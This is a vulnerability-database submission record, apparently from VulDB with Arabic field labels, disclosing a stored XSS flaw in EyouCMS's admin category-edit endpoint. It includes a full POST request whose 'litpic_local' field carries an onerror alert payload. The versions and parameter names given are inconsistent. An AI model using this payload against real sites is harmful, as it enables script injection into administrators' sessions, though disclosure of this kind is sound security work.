إرسال #109630: eyoucms up to 1.6.2 'litpic_loca' stored xss vulnerability POC:المعلومات

عنوان	eyoucms up to 1.6.2 'litpic_loca' stored xss vulnerability POC:
الوصف	eyoucms v1.5.4 typename parameter has a stored XSS vulnerability, attacker can update a new picture to a xss payload, and trigger the vulnerability when edit or view it again. The vulnerable method + URI is: POST /eyou/login.php?m=admin&c=Arctype&a=edit&lang=cn and vulnerable parameter is 'litpic_loca' POC below: POST /eyou/login.php?m=admin&c=Arctype&a=edit&lang=cn HTTP/1.1 *********************************** typename=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&dirname=xinwendongtai&current_channel=1&parent_id=0&channeltype=1&diy_dirpath=%2Fxinwendongtai&dirpath=&is_hidden=0&is_part=0&typelink=&englist_name=News+%26+Trends&litpic_local=%3Cimg+src%3D1+onerror%3Dalert%281%29%3E&litpic_remote=&old_arcrank=0&typearcrank=0&templist=lists_article.htm&tempview=view_article.htm&rulelist=%7B%E6%A0%8F%E7%9B%AE%E7%9B%AE%E5%BD%95%7D%2Flist_%7Btid%7D_%7Bpage%7D.html&ruleview=%7B%E6%A0%8F%E7%9B%AE%E7%9B%AE%E5%BD%95%7D%2F%7Baid%7D.html&seo_title=&seo_keywords=&seo_description=&tab=1&id=2&grade=0&oldgrade=0&old_current_channel=1 See details and poc at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS1.md
المصدر	⚠️ https://www.eyoucms.com/
المستخدم	WWesleywww (UID 43117)
ارسال	03/04/2023 02:38 PM (3 سنوات منذ)
الاعتدال	14/04/2023 10:34 AM (11 days later)
الحالة	تمت الموافقة
إدخال VulDB	225942 [EyouCms 1.5.4 New Picture login.php?m=admin&c=Arctype&a=edit litpic_loca البرمجة عبر المواقع]
النقاط	17

التالي ▸نظرة عامة ◂ السابق

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!